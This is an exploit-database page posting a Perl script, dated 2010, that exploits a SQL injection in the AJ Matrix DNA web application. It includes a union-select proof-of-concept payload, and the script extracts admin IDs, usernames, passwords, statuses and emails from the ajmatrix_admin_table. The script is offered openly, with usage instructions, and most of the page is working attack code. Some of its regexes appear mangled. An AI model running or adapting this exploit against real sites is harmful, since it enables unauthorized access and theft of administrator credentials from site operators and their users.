[webapps / 0day] - AJ Matrix DNA SQL Injection Vulnerability
Posted on 09 December 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>AJ Matrix DNA SQL Injection Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='AJ Matrix DNA SQL Injection Vulnerability by Br0ly in webapps / 0day | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>========================================= AJ Matrix DNA SQL Injection Vulnerability ========================================= #!usr/bin/perl #|------------------------------------------------------------------------------------------------------------------ #| -Info: # #| -Name: AJ Matrix DNA #| -Site: http://www.ajsquare.com/ajhome.php #| -Bug: Sql Injection #| -Found: by Br0ly #| -BRAZIL >D #| -Contact: br0ly[dot]Code[at]gmail[dot]com #| #| -Gretz: Osirys , Out0fBound #| #| -p0c: #| -SQL INJECTION: #| #| -9999+union+all+select+0,1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15-- #| #| -------------------------------------- #| -AJ Matrix DNA #| -Sql Injection #| -by Br0ly #| -------------------------------------- #| #| #| #| #| >D, And sorry for my bad english ;/ #| #| use IO::Socket::INET; use LWP::UserAgent; my $host = $ARGV[0]; my $sql_path = "/index.php?do=productdetail&id="; if (@ARGV < 1) { &banner(); &help("-1"); } elsif(cheek($host) == 1) { &banner(); &xploit($host,$sql_path); } else { &banner(); help("-2"); } sub xploit() { my $host = $_[0]; my $sql_path = $_[1]; print "[+] Getting the id,login,pass,status of the admin. "; my $sql_atk = $host.$sql_path."-9999+union+all+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(0x6272306c79,0x3a,admin_id,0x3a,admin_username,0x3a,admin_password,0x3a,admin_status,0x3a,admin_email,0x3a,0x6272306c79)+from+ajmatrix_admin_table--"; my $sql_get = get_url($sql_atk); my $connect = tag($sql_get); if($connect =~ /br0ly:(.+):(.+):(.+):(.+):(.+):br0ly/) { print "[+] ID = $1 "; print "[+] User = $2 "; print "[+] Pass = $3 "; print "[+] Status = $4 "; print "[+] Email = $5 "; exit(0); } else { print "[-] Exploit, Fail "; exit(0); } } sub get_url() { $link = $_[0]; my $req = HTTP::Request->new(GET => $link); my $ua = LWP::UserAgent->new(); $ua->timeout(4); my $response = $ua->request($req); return $response->content; } sub tag() { my $string = $_[0]; $string =~ s/ /$/g; $string =~ s/s/*/g; return($string); } sub cheek() { my $host = $_[0]; if ($host =~ /http://(.*)/) { return 1; } else { return 0; } } sub help() { my $error = $_[0]; if ($error == -1) { print " [-] Error, missed some arguments ! "; } elsif ($error == -2) { print " [-] Error, Bad arguments ! "; } print "[*] Usage : perl $0 http://localhost/ajmatrixdna/ "; print " Ex: perl $0 http://localhost/ajmatrixdna/ "; exit(0); } sub banner { print " ". " -------------------------------------- ". " -AJ Matrix DNA ". " -Sql Injection ". " -by Br0ly ". " -------------------------------------- "; } # <a href='http://1337db.com/'>1337db.com</a> [2010-12-09]</pre></body></html>
